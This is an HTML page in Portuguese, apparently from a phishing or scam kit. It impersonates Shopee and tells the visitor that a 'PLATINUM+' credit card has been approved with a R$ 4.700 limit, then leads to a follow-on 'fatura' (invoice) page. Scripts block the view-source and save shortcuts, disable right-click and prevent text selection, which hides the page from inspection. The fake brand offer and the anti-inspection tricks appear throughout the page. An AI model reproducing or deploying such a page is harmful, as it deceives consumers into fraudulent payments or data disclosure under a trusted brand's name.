<!DOCTYPE html><html lang="pt-BR">
<head>
     <!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'../../www.googletagmanager.com/gtm5445.html?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-PZGDSCMH');</script>
<!-- End Google Tag Manager -->
    
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/png" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/icon_favicon_1_32.0Wecxv.png">
    <title>Cartão Aprovado</title>
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <style>
        body {
            font-family: 'Arial', sans-serif;
            background-color: #f9f9f9;
            color: #333;
            margin: 0;
            padding: 0;
            display: flex;
            flex-direction: column;
            min-height: 100vh;
        }

        .header {
            background-color: white;
            padding: 15px 0;
            text-align: center;
            font-size: 1.5rem;
            font-weight: bold;
            border-bottom: solid 3px #ee4d2d;
        }

        .header img {
            width: 120px;
        }

        .main-content {
            max-width: 600px;
            background: #fff;
            margin: 30px auto;
            padding: 30px;
            border-radius: 10px;
            box-shadow: 0 4px 15px rgba(0, 0, 0, 0.1);
        }

        .success-icon {
            width: 60px;
            height: 60px;
            margin: 0 auto 20px;
            display: flex;
            align-items: center;
            justify-content: center;
            background-color: #d4f9e5;
            border-radius: 50%;
        }

        .success-icon img {
            width: 40px;
        }

        .highlight-box {
            background-color: #f0f0f0;
            padding: 15px;
            border-radius: 8px;
            margin: 20px 0;
            text-align: center;
            color: #333;
            font-size: 14px;
        }

        .limit-card {
            background-color: #ee4d2d;
            color: #fff;
            padding: 15px;
            border-radius: 8px;
            text-align: center;
            margin: 20px 0;
        }

        .limit-card h5 {
            margin: 0;
            font-size: 18px;
            text-transform: uppercase;
        }

        .limit-card p {
            font-size: 24px;
            font-weight: bold;
            margin: 5px 0 0 0;
        }

        .benefits-list {
            margin: 20px 0;
        }

        .benefits-list .benefit-item {
            display: flex;
            align-items: center;
            padding: 10px;
            border: 1px solid #e6e6e6;
            border-radius: 8px;
            margin-bottom: 10px;
            background-color: #f9f9f9;
        }

        .benefits-list .benefit-item img {
            width: 24px;
            height: 24px;
            margin-right: 15px;
        }

        .btn-custom {
            width: 100%;
            padding: 12px;
            background-color: #ee4d2d;
            color: #fff;
            border: none;
            border-radius: 8px;
            font-size: 16px;
            font-weight: bold;
            text-align: center;
            cursor: pointer;
        }

        .btn-custom:hover {
            background-color: #000;
        }

        .footer {
        background: #ffffff;
        border-top: 1px solid #e6e6e6;
        text-align: center;
        padding: 15px;
        font-size: 10px;
        color: #666;
    }
    </style>
<script>
if (document.addEventListener) {
    document.addEventListener("keydown", bloquearSource);
} else { //Versões antigas do IE
    document.attachEvent("onkeydown", bloquearSource);
}

function bloquearSource(e) {
    e = e || window.event;

    var code = e.which || e.keyCode;

    if (
        e.ctrlKey &&
        (code == 83 || code == 85) //83 = S, 85 = U
    ) {
        if (e.preventDefault) {
            e.preventDefault();
        } else {
            e.returnValue = false;
        }

        return false;
    }
}
</script><style>
/*desabilita a seleção no body*/
body {
    -webkit-touch-callout: none; /* iOS Safari */
      -webkit-user-select: none; /* Chrome/Safari/Opera */
       -khtml-user-select: none; /* Konqueror */
         -moz-user-select: none; /* Firefox */
          -ms-user-select: none; /* Internet Explorer/Edge */
              user-select: none;
}

/*habilita a seleção nos campos editaveis*/
input, textarea {
    -webkit-touch-callout: initial; /* iOS Safari */
      -webkit-user-select: text; /* Chrome/Safari/Opera */
       -khtml-user-select: text; /* Konqueror */
         -moz-user-select: text; /* Firefox */
          -ms-user-select: text; /* Internet Explorer/Edge */
              user-select: text;
}

/*habilita a seleção nos campos com o atributo contenteditable*/
[contenteditable=true] {
    -webkit-touch-callout: initial; /* iOS Safari */
      -webkit-user-select: all; /* Chrome/Safari/Opera */
       -khtml-user-select: all; /* Konqueror */
         -moz-user-select: all; /* Firefox */
          -ms-user-select: all; /* Internet Explorer/Edge */
              user-select: all;
}
</style><script>
if (document.addEventListener) {
    document.addEventListener("contextmenu", function(e) {
        e.preventDefault();
        return false;
    });
} else { //Versões antigas do IE
    document.attachEvent("oncontextmenu", function(e) {
        e = e || window.event;
        e.returnValue = false;
        return false;
    });
}
</script>
</head>
    <!-- Header -->
    <div class="header">
        <img src="images/shopee-logo.png" alt="YES Card">
    </div>

    <!-- Main Content -->
    <div class="main-content">
        <!-- Success Icon -->
        <div class="success-icon">
            <img src="images/ok--v1.png" alt="Aprovado">
        </div>
        <h3 class="text-center">Seu cartão foi aprovado com sucesso!</h3>
        <p class="text-center text-muted">Parabéns! Você agora tem acesso a todos os benefícios exclusivos do seu novo cartão.</p>

        <!-- Limite Box -->
        <div class="highlight-box">
            Analisamos suas informações e notamos que este é o primeiro cartão que você solicita conosco. Sendo assim, não conseguimos liberar limites acima de R$ 5.000,00.
        </div>

        <div class="limit-card">
            <h8>Seu novo cartão</h8><br>
            <h5>PLATINUM+</h5><br>
            
             <h8>Limite Aprovado</h8>
            <p>R$ 4.700,00</p>
        </div>

        <!-- Benefícios -->
        <h5>Conheça o novo cartão PLATINUM+</h5>
        <p class="text-muted">Além do crédito liberado, você terá esses benefícios:</p>
        <div class="benefits-list">
            <div class="benefit-item">
                <img src="images/atm.png" alt="Saque">
                <span>Saque até 50% do limite em caixa eletrônico 24h</span>
            </div>
            <div class="benefit-item">
                <img src="images/discount.png" alt="Cashback">
                <span>Cashback de até 5% em compras online</span>
            </div>
            <div class="benefit-item">
                <img src="images/pharmacy-shop.png" alt="Farmácia">
                <span>Descontos de até 15% em farmácias Pacheco</span>
            </div>
            <div class="benefit-item">
                <img src="images/shopping-bag.png" alt="Lojas Parceiras">
                <span>Descontos em lojas parceiras</span>
            </div>
            <div class="benefit-item">
                <img src="images/airport.png" alt="VIP">
                <span>Acesso a salas VIP em aeroportos</span>
            </div>
        </div>

        <!-- Button -->
        <button class="btn-custom" onclick="location.href='../fatura/index.html'">Continuar</button>
    </div>

    <!-- Footer -->
    <div class="footer">
Copyright 2025 Shopee. Todos os direitos reservados.<br>

Política de Privacidade | Termos de Uso Vendas e Reembolsos | Legal Mapa do Site
    </div>

<body><!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'../../www.googletagmanager.com/gtm5445.html?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-PZGDSCMH');</script>
<!-- End Google Tag Manager -->
</body>
</html>